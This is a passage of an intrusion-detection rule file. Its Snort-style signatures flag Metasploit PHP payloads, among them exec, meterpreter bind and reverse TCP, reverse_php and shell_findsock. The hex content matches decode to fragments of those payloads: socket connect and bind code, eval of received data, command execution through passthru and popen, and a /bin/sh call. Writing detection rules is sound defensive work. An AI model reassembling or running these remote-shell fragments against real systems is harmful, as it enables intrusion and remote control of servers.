65 2c 20 22 77 62 22 29 3b 0a 09 09 77 68 69 6c 65 20 28 21 66 65 6f 66 28 24 66 64 5f 69 6e 29 29 20 7b 0a 09 09 09 66 77 72 69 74 65 28 24 66 64 5f 6f 75 74 2c 20 66 72 65 61 64 28 24 66 64 5f 69 6e 2c 20 38 31 39 32 29 29 |"; content:"| 09 66 63 6c 6f 73 65 |"; content:"| 28 24 66 64 5f 69 6e 29 3b 0a 09 09 66 63 6c 6f 73 65 28 24 66 64 5f 6f 75 74 29 3b 0a 09 09 63 68 6d 6f 64 28 24 66 6e 61 6d 65 2c 20 30 37 37 37 29 3b 0a 09 09 24 63 20 3d 20 24 66 6e 61 6d 65 3b 0a 09 09 0a 09 09 09 40 73 65 74 5f 74 69 6d 65 5f 6c 69 6d 69 74 28 30 29 3b 20 40 69 67 6e 6f 72 65 5f 75 73 65 72 5f 61 62 6f 72 74 28 31 29 3b 20 40 69 6e 69 5f 73 65 74 28 27 6d 61 78 5f 65 78 65 63 75 74 69 6f 6e 5f 74 69 6d 65 27 2c 30 29 3b 0a 09 09 09 24 |"; content:"| 3d 40 69 6e 69 5f 67 65 74 28 27 64 69 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 27 29 3b 0a 09 09 09 69 66 28 21 65 6d 70 74 79 28 24 |"; content:"| 29 29 7b 0a 09 09 09 09 24 |"; content:"| 3d 70 72 65 67 5f 72 65 70 6c 61 63 65 28 27 2f 5b 2c 20 5d 2b 2f 27 2c 20 27 2c 27 2c 20 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 65 78 70 6c 6f 64 65 28 27 2c 27 2c 20 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 61 72 72 61 79 5f |"; content:"| 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 24 |"; content:"| 3d 61 72 72 61 79 28 29 3b 0a 09 09 09 7d 0a 09 09 09 0a 09 09 0a 09 09 09 69 66 20 |"; content:"| 41 4c 53 45 20 21 3d 3d 20 73 74 72 70 6f 73 28 73 74 72 74 6f 6c 6f 77 65 72 28 50 48 50 5f 4f 53 29 2c 20 27 77 69 6e 27 20 29 29 20 7b 0a 09 09 09 09 24 63 3d 24 63 2e 22 20 32 3e 26 31 5c 6e 22 3b 0a 09 09 09 7d 0a 09 09 09 24 |"; content:"| 3d 27 69 73 5f 63 61 6c 6c 61 62 6c 65 27 3b 0a 09 09 09 24 |"; content:"| 3d 27 69 6e 5f 61 72 72 61 79 27 3b 0a 09 09 09 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 29 7b 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 |"; content:"| 29 29 7b 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 29 3b 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 7b 0a 09 09 09 09 24 |"; content:"| 3d 30 3b 0a 09 09 09 7d 0a 09 09 0a 09 09 40 75 6e 6c 69 6e 6b 28 24 66 6e 61 6d 65 29 3b 0a |"; sid:1000102; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/exec"; flow:established; content:"| 24 63 20 3d 20 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 22 |"; content:"| 41 41 41 3d 22 29 3b 20 40 73 65 74 5f 74 69 6d 65 5f 6c 69 6d 69 74 28 30 29 3b 20 40 69 67 6e 6f 72 65 5f 75 73 65 72 5f 61 62 6f 72 74 28 31 29 3b 20 40 69 6e 69 5f 73 65 74 28 27 6d 61 78 5f 65 78 65 63 75 74 69 6f 6e 5f 74 69 6d 65 27 2c 30 29 3b 20 24 |"; content:"| 3d 40 69 6e 69 5f 67 65 74 28 27 64 69 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 27 29 3b 20 69 66 28 21 65 6d 70 74 79 28 24 |"; content:"| 29 29 7b 20 24 |"; content:"| 3d 70 72 65 67 5f 72 65 70 6c 61 63 65 28 27 2f 5b 2c 20 5d 2b 2f 27 2c 20 27 2c 27 2c 20 24 |"; content:"| 29 3b 20 24 |"; content:"| 3d 65 78 70 6c 6f 64 65 28 27 2c 27 2c 20 24 |"; content:"| 29 3b 20 24 |"; content:"| 3d 61 72 72 61 79 5f 6d 61 70 28 27 74 72 69 6d 27 2c 20 24 |"; content:"| 29 3b 20 7d 65 6c 73 65 7b 20 24 |"; content:"| 3d 61 72 72 61 79 28 29 3b 20 7d 20 69 66 20 28 46 41 4c |"; content:"| 50 5f 4f 53 29 2c 20 27 77 69 6e 27 20 29 29 20 7b 20 24 63 3d 24 63 2e 22 20 32 3e 26 31 5c 6e 22 3b 20 7d 20 24 |"; content:"| 3d 27 69 73 5f 63 61 6c 6c 61 62 6c 65 27 3b 20 |"; content:"| 61 79 27 3b 20 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 29 7b 20 |"; content:"| 28 29 3b 20 |"; content:"| 28 24 63 29 3b 20 24 |"; content:"| 3d 6f 62 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 29 3b 20 6f 62 5f 65 6e 64 5f 63 6c 65 61 6e 28 29 3b 20 7d 65 6c 73 65 20 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 29 7b 20 |"; content:"| 29 3b 20 7d 65 6c 73 65 |"; content:"| 20 7b 20 24 |"; content:"| 3d 30 3b 20 7d |"; sid:1000103; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/meterpreter/bind_tcp"; flow:established; content:"| 23 3c 3f 70 68 70 0a 0a 23 20 54 68 65 20 70 61 79 6c 6f 61 64 20 68 61 6e 64 6c 65 72 20 6f 76 65 72 77 72 69 74 65 73 20 74 68 69 73 20 77 69 74 68 20 74 68 65 20 63 6f 72 72 65 63 74 20 4c 50 4f 52 54 20 62 65 66 6f 72 65 20 73 65 6e 64 69 6e 67 0a 23 20 69 74 20 74 6f 20 74 68 65 20 76 69 63 74 69 6d 2e 0a 24 70 6f 72 74 20 3d 20 |"; content:"| 3b 0a 24 69 70 61 64 64 72 20 3d 20 22 30 2e 30 2e 30 2e 30 22 3b 0a 0a 69 66 20 28 69 73 5f 63 61 6c 6c 61 62 6c 65 28 27 73 74 72 65 61 6d 5f 73 6f 63 6b 65 74 5f 73 65 72 76 65 72 27 29 29 20 7b 0a 09 24 73 72 76 73 6f 63 6b 20 3d 20 73 74 72 65 61 6d 5f 73 6f 63 6b 65 74 5f 73 65 72 76 65 72 28 22 74 63 70 3a 2f 2f 7b 24 69 70 61 64 64 72 7d 3a 7b 24 70 6f 72 74 7d 22 29 3b 0a 09 69 66 20 28 21 24 73 72 76 73 6f 63 6b 29 20 7b 20 64 69 65 28 29 3b 20 7d 0a 09 24 73 20 3d 20 73 74 72 65 61 6d 5f 73 6f 63 6b 65 74 5f 61 63 63 65 70 74 28 24 73 72 76 73 6f 63 6b 2c 20 2d 31 29 3b 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 74 72 65 61 6d 27 3b 0a 7d 20 |"; content:"| 65 6c 73 65 69 66 20 28 69 73 5f 63 61 6c 6c 61 62 6c 65 28 27 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 5f 6c 69 73 74 65 6e 27 29 29 20 7b 0a 09 24 73 72 76 73 6f 63 6b 20 3d 20 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 5f 6c 69 73 74 65 6e 28 41 46 5f 49 4e 45 54 2c 20 53 4f 43 4b 5f 53 54 52 45 41 4d 2c 20 53 4f 4c 5f 54 43 50 29 3b 0a 09 69 66 20 28 21 24 72 65 73 29 20 7b 20 64 69 65 28 29 3b 20 7d 0a 09 24 73 20 3d 20 73 6f 63 6b 65 74 5f 61 63 63 65 70 74 28 24 73 72 76 73 6f 63 6b 29 3b 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 6f 63 6b 65 74 27 3b 0a 7d 20 65 6c 73 65 69 66 20 28 69 73 5f 63 61 6c 6c 61 62 6c 65 28 27 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 27 29 29 20 7b 0a 09 24 73 72 76 73 6f 63 6b 20 3d 20 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 28 41 46 5f 49 4e 45 54 2c 20 53 4f 43 4b 5f 53 54 52 45 41 4d 2c 20 53 4f 4c 5f 54 43 50 29 3b 0a 09 24 72 65 73 20 3d 20 73 6f 63 6b 65 74 5f 62 69 6e 64 28 24 73 72 76 73 6f 63 6b 2c 20 24 69 70 61 64 64 72 2c 20 24 70 6f 72 74 29 3b |"; content:"| 09 69 66 20 28 21 24 72 65 73 29 20 7b 20 64 69 65 28 29 3b 20 7d 0a 09 24 73 20 3d 20 73 6f 63 6b 65 74 5f 61 63 63 65 70 74 28 24 73 72 76 73 6f 63 6b 29 3b 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 6f 63 6b 65 74 27 3b 0a 7d 20 65 6c 73 65 20 7b 0a 09 64 69 65 28 29 3b 0a 7d 0a 69 66 20 28 21 24 73 29 20 7b 20 64 69 65 28 29 3b 20 7d 0a 0a 73 77 69 74 63 68 20 28 24 73 5f 74 79 70 65 29 20 7b 20 0a 63 61 73 65 20 27 73 74 72 65 61 6d 27 3a 20 24 6c 65 6e 20 3d 20 66 72 65 61 64 28 24 73 2c 20 34 29 3b 20 62 72 65 61 6b 3b 0a 63 61 73 65 20 27 73 6f 63 6b 65 74 27 3a 20 24 6c 65 6e 20 3d 20 73 6f 63 6b 65 74 5f 72 65 61 64 28 24 73 2c 20 34 29 3b 20 62 72 65 61 6b 3b 0a 7d 0a 69 66 20 28 21 24 6c 65 6e 29 20 7b 0a 09 23 20 57 65 20 66 61 69 6c 65 64 20 6f 6e 20 74 68 65 20 6d 61 69 6e 20 73 6f 63 6b 65 74 2e 20 20 54 68 65 72 65 27 73 20 6e 6f 20 77 61 79 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 73 6f 0a 09 23 20 62 61 69 6c 0a 09 64 69 65 28 29 3b 0a 7d 0a 24 61 20 3d 20 75 6e |"; content:"| 61 63 6b 28 22 4e 6c 65 6e 22 2c 20 24 6c 65 6e 29 3b 0a 24 6c 65 6e 20 3d 20 24 61 5b 27 6c 65 6e 27 5d 3b 0a 0a 24 62 20 3d 20 27 27 3b 0a 77 68 69 6c 65 20 28 73 74 72 6c 65 6e 28 24 62 29 20 3c 20 24 6c 65 6e 29 20 7b 0a 09 73 77 69 74 63 68 20 28 24 73 5f 74 79 70 65 29 20 7b 20 0a 09 63 61 73 65 20 27 73 74 72 65 61 6d 27 3a 20 24 62 20 2e 3d 20 66 72 65 61 64 28 24 73 2c 20 24 6c 65 6e 2d 73 74 72 6c 65 6e 28 24 62 29 29 3b 20 62 72 65 61 6b 3b 0a 09 63 61 73 65 20 27 73 6f 63 6b 65 74 27 3a 20 24 62 20 2e 3d 20 73 6f 63 6b 65 74 5f 72 65 61 64 28 24 73 2c 20 24 6c 65 6e 2d 73 74 72 6c 65 6e 28 24 62 29 29 3b 20 62 72 65 61 6b 3b 0a 09 7d 0a 7d 0a 0a 23 20 53 65 74 20 75 70 20 74 68 65 20 73 6f 63 6b 65 74 20 66 6f 72 20 74 68 65 20 6d 61 69 6e 20 73 74 61 67 65 20 74 6f 20 75 73 65 2e 0a 24 47 4c 4f 42 41 4c 53 5b 27 6d 73 67 73 6f 63 6b 27 5d 20 3d 20 24 73 3b 0a 24 47 4c 4f 42 41 4c 53 5b 27 6d 73 67 73 6f 63 6b 5f 74 79 70 65 27 5d 20 3d 20 24 73 5f 74 79 70 65 3b 0a |"; content:"| 61 6c 28 24 62 29 3b 0a 64 69 65 28 29 3b 0a |"; sid:1000104; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/meterpreter/reverse_tcp"; flow:established; content:"| 23 3c 3f 70 68 70 0a 0a 65 72 72 6f 72 5f 72 65 70 6f 72 74 69 6e 67 28 30 29 3b 0a 23 20 54 68 65 20 70 61 79 6c 6f 61 64 20 68 61 6e 64 6c 65 72 20 6f 76 65 72 77 72 69 74 65 73 20 74 68 69 73 20 77 69 74 68 20 74 68 65 20 63 6f 72 72 65 63 74 20 4c 48 4f 53 54 20 62 65 66 6f 72 65 20 73 65 6e 64 69 6e 67 0a 23 20 69 74 20 74 6f 20 74 68 65 20 76 69 63 74 69 6d 2e 0a 24 69 70 20 3d 20 27 |"; content:"| 27 3b 0a 24 70 6f 72 74 20 3d 20 |"; content:"| 3b 0a 69 66 20 28 46 41 4c 53 45 20 21 3d 3d 20 73 74 72 70 6f 73 28 24 69 70 2c 20 22 3a 22 29 29 20 7b 0a 09 23 20 69 70 76 36 20 72 65 71 75 69 72 65 73 20 62 72 61 63 6b 65 74 73 20 61 72 6f 75 6e 64 20 74 68 65 20 61 64 64 72 65 73 73 0a 09 24 69 70 20 3d 20 22 5b 22 2e 20 24 69 70 20 2e 22 5d 22 3b 0a 7d 0a 0a 69 66 20 28 28 24 66 20 3d 20 27 73 74 72 65 61 6d 5f 73 6f 63 6b 65 74 5f 63 6c 69 65 6e 74 27 29 20 26 26 20 69 73 5f 63 61 6c 6c 61 62 6c 65 28 24 66 29 29 20 7b 0a 09 24 73 20 3d 20 24 66 28 22 74 63 70 3a 2f 2f 7b 24 69 70 7d |"; content:"| 3a 7b 24 70 6f |"; content:"| 74 7d 22 29 3b 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 74 72 65 61 6d 27 3b 0a 7d 20 65 6c 73 65 69 66 20 28 28 24 66 20 3d 20 27 66 73 6f 63 6b 6f 70 65 6e 27 29 20 26 26 20 69 73 5f 63 61 6c 6c 61 62 6c 65 28 24 66 29 29 20 7b 0a 09 24 73 20 3d 20 24 66 28 24 69 70 2c 20 24 70 6f 72 74 29 3b 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 74 72 65 61 6d 27 3b 0a 7d 20 65 6c 73 65 69 66 20 28 28 24 66 20 3d 20 27 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 27 29 20 26 26 20 69 73 5f 63 61 6c 6c 61 62 6c 65 28 24 66 29 29 20 7b 0a 09 24 73 20 3d 20 24 66 28 41 46 5f 49 4e 45 54 2c 20 53 4f 43 4b 5f 53 54 52 45 41 4d 2c 20 53 4f 4c 5f 54 43 50 29 3b 0a 09 24 72 65 73 20 3d 20 40 73 6f 63 6b 65 74 5f 63 6f 6e 6e 65 63 74 28 24 73 2c 20 24 69 70 2c 20 24 70 6f 72 74 29 3b 0a 09 69 66 20 28 21 24 72 65 73 29 20 7b 20 64 69 65 28 29 3b 20 7d 0a 09 24 73 5f 74 79 70 65 20 3d 20 27 73 6f 63 6b 65 74 27 3b 0a 7d 20 65 6c 73 65 20 7b 0a 09 64 69 65 28 27 6e 6f 20 73 6f 63 6b 65 74 20 |"; content:"| 75 6e 63 73 27 |"; content:"| 29 3b 0a 7d 0a 69 66 20 28 21 24 73 29 20 7b 20 64 69 65 28 27 6e 6f 20 73 6f 63 6b 65 74 27 29 3b 20 7d 0a 0a 73 77 69 74 63 68 20 28 24 73 5f 74 79 70 65 29 20 7b 20 0a 63 61 73 65 20 27 73 74 72 65 61 6d 27 3a 20 24 6c 65 6e 20 3d 20 66 72 65 61 64 28 24 73 2c 20 34 29 3b 20 62 72 65 61 6b 3b 0a 63 61 73 65 20 27 73 6f 63 6b 65 74 27 3a 20 24 6c 65 6e 20 3d 20 73 6f 63 6b 65 74 5f 72 65 61 64 28 24 73 2c 20 34 29 3b 20 62 72 65 61 6b 3b 0a 7d 0a 69 66 20 28 21 24 6c 65 6e 29 20 7b 0a 09 23 20 57 65 20 66 61 69 6c 65 64 20 6f 6e 20 74 68 65 20 6d 61 69 6e 20 73 6f 63 6b 65 74 2e 20 20 54 68 65 72 65 27 73 20 6e 6f 20 77 61 79 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 73 6f 0a 09 23 20 62 61 69 6c 0a 09 64 69 65 28 29 3b 0a 7d 0a 24 61 20 3d 20 75 6e 70 61 63 6b 28 22 4e 6c 65 6e 22 2c 20 24 6c 65 6e 29 3b 0a 24 6c 65 6e 20 3d 20 24 61 5b 27 6c 65 6e 27 5d 3b 0a 0a 24 62 20 3d 20 27 27 3b 0a 77 68 69 6c 65 20 28 73 74 72 6c 65 6e 28 24 62 29 20 3c 20 24 6c 65 6e 29 20 |"; content:"| 7b 0a 09 73 |"; content:"| 77 69 74 63 68 20 28 24 73 5f 74 79 70 65 29 20 7b 20 0a 09 63 61 73 65 20 27 73 74 72 65 61 6d 27 3a 20 24 62 20 2e 3d 20 66 72 65 61 64 28 24 73 2c 20 24 6c 65 6e 2d 73 74 72 6c 65 6e 28 24 62 29 29 3b 20 62 72 65 61 6b 3b 0a 09 63 61 73 65 20 27 73 6f 63 6b 65 74 27 3a 20 24 62 20 2e 3d 20 73 6f 63 6b 65 74 5f 72 65 61 64 28 24 73 2c 20 24 6c 65 6e 2d 73 74 72 6c 65 6e 28 24 62 29 29 3b 20 62 72 65 61 6b 3b 0a 09 7d 0a 7d 0a 0a 23 20 53 65 74 20 75 70 20 74 68 65 20 73 6f 63 6b 65 74 20 66 6f 72 20 74 68 65 20 6d 61 69 6e 20 73 74 61 67 65 20 74 6f 20 75 73 65 2e 0a 24 47 4c 4f 42 41 4c 53 5b 27 6d 73 67 73 6f 63 6b 27 5d 20 3d 20 24 73 3b 0a 24 47 4c 4f 42 41 4c 53 5b 27 6d 73 67 73 6f 63 6b 5f 74 79 70 65 27 5d 20 3d 20 24 73 5f 74 79 70 65 3b 0a 65 76 61 6c 28 24 62 29 3b 0a 64 69 65 28 29 3b 0a |"; sid:1000105; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/reverse_php"; flow:established; content:"| 09 09 24 69 70 61 64 64 72 3d 6c 6f 6e 67 32 69 70 28 31 |"; content:"| 29 3b 0a 09 09 24 70 6f 72 74 3d |"; content:"| 3b 0a 09 09 0a 09 09 09 40 73 65 74 5f 74 69 6d 65 5f 6c 69 6d 69 74 28 30 29 3b 20 40 69 67 6e 6f 72 65 5f 75 73 65 72 5f 61 62 6f 72 74 28 31 29 3b 20 40 69 6e 69 5f 73 65 74 28 27 6d 61 78 5f 65 78 65 63 75 74 69 6f 6e 5f 74 69 6d 65 27 2c 30 29 3b 0a 09 09 09 24 64 69 73 3d 40 69 6e 69 5f 67 65 74 28 27 64 69 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 27 29 3b 0a 09 09 09 69 66 28 21 65 6d 70 74 79 28 24 64 69 73 29 29 7b 0a 09 09 09 09 24 64 69 73 3d 70 72 65 67 5f 72 65 70 6c 61 63 65 28 27 2f 5b 2c 20 5d 2b 2f 27 2c 20 27 2c 27 2c 20 24 64 69 73 29 3b 0a 09 09 09 09 24 64 69 73 3d 65 78 70 6c 6f 64 65 28 27 2c 27 2c 20 24 64 69 73 29 3b 0a 09 09 09 09 24 64 69 73 3d 61 72 72 61 79 5f 6d 61 70 28 27 74 72 69 6d 27 2c 20 24 64 69 73 29 3b 0a 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 24 64 69 73 3d 61 72 72 61 79 28 29 3b 0a 09 09 09 7d 0a 09 09 09 0a 0a 09 09 69 |"; content:"| 66 28 21 66 75 6e |"; content:"| 74 69 6f 6e 5f 65 78 69 73 74 73 28 27 |"; content:"| 27 29 29 7b 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 |"; content:"| 28 24 63 29 7b 0a 09 09 09 09 67 6c 6f 62 61 6c 20 24 64 69 73 3b 0a 09 09 09 09 0a 09 09 09 69 66 20 28 46 41 4c 53 45 20 21 3d 3d 20 73 74 72 70 6f 73 28 73 74 72 74 6f 6c 6f 77 65 72 28 50 48 50 5f 4f 53 29 2c 20 27 77 69 6e 27 20 29 29 20 7b 0a 09 09 09 09 24 63 3d 24 63 2e 22 20 32 3e 26 31 5c 6e 22 3b 0a 09 09 09 7d 0a 09 09 09 24 |"; content:"| 3d 27 69 73 5f 63 61 6c 6c 61 62 6c 65 27 3b 0a 09 09 09 24 |"; content:"| 3d 27 69 6e 5f 61 72 72 61 79 27 3b 0a 09 09 09 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 27 2c 24 64 69 73 29 29 7b 0a 09 09 09 09 |"; content:"| 3b 0a 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 28 27 70 61 73 73 74 68 72 75 27 29 61 6e 64 21 24 |"; content:"| 28 27 70 61 73 73 74 68 72 75 27 2c 24 64 69 73 29 29 7b 0a 09 09 09 09 6f 62 5f 73 74 61 72 74 28 29 3b 0a 09 09 09 09 70 61 73 73 74 68 72 75 28 24 63 29 3b 0a 09 |"; content:"| 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 29 |"; content:"| 3b 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 6f 70 65 6e 27 29 61 6e 64 21 24 |"; content:"| 6f 70 65 6e 27 2c 24 64 69 73 29 29 7b 0a 09 09 09 09 24 |"; content:"| 6f 70 65 6e 28 24 63 2c |"; content:"| 29 3b 0a 09 09 09 09 24 6f 3d |"; content:"| 3b 0a 09 09 09 |"; content:"| 29 29 7b 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 7b 0a 09 09 09 09 24 6f 3d 30 3b 0a 09 09 09 7d 0a 09 09 0a 09 09 09 09 72 65 74 75 72 6e 20 24 6f 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 24 6e 6f 66 75 6e 63 73 3d 27 6e 6f 20 65 78 65 63 20 66 75 6e 63 74 69 6f 6e 73 27 3b 0a 09 09 69 66 28 69 73 5f 63 61 6c 6c 61 62 6c 65 |"; content:"| 6e 27 2c 24 64 69 73 29 29 7b 0a 09 09 09 24 73 |"; content:"| 6c 65 28 24 63 3d 66 72 65 61 64 28 24 73 2c 32 30 34 38 29 29 7b 0a 09 09 09 09 24 6f 75 74 20 3d 20 27 27 3b 0a 09 09 09 09 69 66 28 73 75 62 73 74 72 28 24 63 2c 30 2c 33 29 20 3d 3d 20 27 63 64 20 27 29 7b 0a 09 09 09 09 09 63 68 64 69 72 28 73 75 62 73 74 72 28 24 63 2c 33 2c 2d 31 29 29 3b 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 73 75 62 73 74 72 28 24 63 2c 30 2c 34 29 20 3d 3d 20 27 71 75 69 74 27 20 7c 7c 20 73 75 62 73 74 72 28 24 63 2c 30 2c 34 29 20 3d 3d 20 27 65 78 69 74 27 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 09 24 6f 75 74 3d |"; content:"| 28 73 75 62 73 74 72 28 24 63 2c 30 2c 2d 31 29 29 3b 0a 09 09 09 09 09 69 66 28 24 6f 75 74 3d 3d 3d 66 61 6c 73 65 29 7b 0a 09 09 09 09 09 09 66 77 72 69 74 65 28 |"; content:"| 3d 40 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 28 41 46 5f 49 4e 45 54 2c 53 4f 43 4b 5f 53 54 52 45 41 4d 2c 53 4f 4c 5f 54 43 50 29 3b 0a 09 09 09 40 73 6f 63 6b 65 74 5f 63 6f 6e 6e 65 63 74 28 24 73 2c 24 69 70 61 64 64 72 2c 24 70 6f 72 74 29 3b 0a 09 09 09 40 73 6f 63 6b 65 74 5f 77 72 69 74 65 28 24 73 2c 22 73 6f 63 6b 65 74 5f 63 72 65 61 74 65 22 29 3b 0a 09 09 09 77 68 69 6c 65 28 24 63 3d 40 73 6f 63 6b 65 74 5f 72 65 61 64 28 24 73 2c 32 30 34 38 29 29 7b 0a 09 09 09 09 24 6f 75 74 20 3d 20 27 27 3b 0a 09 09 09 09 69 66 28 73 75 62 73 74 72 28 24 63 2c 30 2c 33 29 20 3d 3d 20 27 63 64 20 27 29 7b 0a 09 09 09 09 09 63 68 64 69 72 28 73 75 62 73 74 72 28 24 63 2c 33 2c 2d 31 29 29 3b 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 |"; content:"| 3d 3d 3d 66 61 6c 73 65 29 7b 0a 09 09 09 09 09 09 40 73 6f 63 6b 65 74 5f 77 72 69 74 65 28 24 73 2c 24 6e 6f 66 75 6e 63 73 29 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 09 40 73 6f 63 6b 65 74 5f 77 72 69 74 65 28 24 73 2c 24 6f 75 74 2c 73 74 72 6c 65 6e 28 24 6f 75 74 29 29 3b 0a 09 09 09 7d 0a 09 09 09 40 73 6f 63 6b 65 74 5f 63 6c 6f 73 65 28 24 73 29 3b 0a 09 09 7d 0a |"; sid:1000107; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"php/shell_findsock"; flow:established; content:"| 65 72 72 6f 72 5f 72 65 70 6f 72 74 69 6e 67 28 30 29 3b 0a 70 72 69 6e 74 28 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 22 29 3b 0a 66 6c 75 73 68 28 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 6d 79 73 79 73 74 65 6d 28 24 |"; content:"| 29 7b 0a 09 0a 09 09 09 40 73 65 74 5f 74 69 6d 65 5f 6c 69 6d 69 74 28 30 29 3b 20 40 69 67 6e 6f 72 65 5f 75 73 65 72 5f 61 62 6f 72 74 28 31 29 3b 20 40 69 6e 69 5f 73 65 74 28 27 6d 61 78 5f 65 78 65 63 75 74 69 6f 6e 5f 74 69 6d 65 27 2c 30 29 3b 0a 09 09 09 24 |"; content:"| 3d 40 69 6e 69 5f 67 65 74 28 27 64 69 73 61 62 6c 65 5f 66 75 6e 63 74 69 6f 6e 73 27 29 3b 0a 09 09 09 69 66 28 21 65 6d 70 74 79 28 24 |"; content:"| 29 29 7b 0a 09 09 09 09 24 |"; content:"| 3d 70 72 65 67 5f 72 65 70 6c 61 63 65 28 27 2f 5b 2c 20 5d 2b 2f 27 2c 20 27 2c 27 2c 20 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 65 78 70 6c 6f 64 65 28 27 2c 27 2c 20 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 61 72 72 61 79 5f |"; content:"| 6d 61 70 28 27 74 72 69 6d 27 2c 20 24 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 24 |"; content:"| 3d 61 72 72 61 79 |"; content:"| 3b 0a 09 09 09 7d 0a 09 09 09 0a 09 0a 09 09 09 69 66 20 28 46 41 4c 53 45 20 21 3d 3d 20 73 74 72 70 6f 73 28 73 74 72 74 6f 6c 6f 77 65 72 28 50 48 50 5f 4f 53 29 2c 20 27 77 69 6e 27 20 29 29 20 7b 0a 09 09 09 09 24 |"; content:"| 2e 22 20 32 3e 26 31 5c 6e 22 3b 0a 09 09 09 7d 0a 09 09 09 24 |"; content:"| 3d 27 69 73 5f 63 61 6c 6c 61 62 6c 65 27 3b 0a 09 09 09 24 |"; content:"| 3d 27 69 6e 5f 61 72 72 61 79 27 3b 0a 09 09 09 0a 09 09 09 69 66 28 24 |"; content:"| 28 27 70 6f 70 65 6e 27 29 61 6e 64 21 24 |"; content:"| 28 27 70 6f 70 65 6e 27 2c 24 |"; content:"| 29 29 7b 0a 09 09 09 09 24 66 70 3d 70 6f 70 65 6e 28 24 |"; content:"| 2c 27 72 27 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 4e 55 4c 4c 3b 0a 09 09 09 09 69 66 28 |"; content:"| 73 6f 75 72 63 65 28 24 66 70 29 29 7b 0a 09 09 09 09 09 77 68 69 6c 65 28 21 66 65 6f 66 28 24 66 70 29 29 7b 0a 09 09 09 09 09 09 24 |"; content:"| 2e 3d 66 72 65 61 64 28 24 66 70 2c 31 30 |"; content:"| 0a 09 09 09 7d 65 |"; content:"| 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 29 7b 0a 09 09 09 09 6f 62 5f 73 74 61 72 74 28 29 3b 0a 09 09 09 09 70 61 73 73 74 68 72 75 28 24 |"; content:"| 29 3b 0a 09 09 09 09 24 |"; content:"| 3d 6f 62 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 29 3b 0a 09 09 09 09 6f 62 5f 65 6e 64 5f 63 6c 65 61 6e 28 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 69 66 28 24 |"; content:"| 27 29 61 6e 64 21 24 |"; content:"| 29 29 7b 0a 09 09 09 09 24 |"; content:"| 29 3b 0a 09 09 09 09 |"; content:"| 0a 09 09 09 09 |"; content:"| 29 3b 0a 09 09 09 7d 65 6c 73 65 0a 09 09 09 |"; content:"| 7b 0a 09 09 09 09 24 |"; content:"| 3b 0a 09 09 09 7d |"; content:"| 09 72 65 74 75 72 6e 20 |"; content:"| 73 68 20 32 3e 2f 64 65 76 2f 6e 75 6c 6c 20 3c 26 24 69 20 2d 63 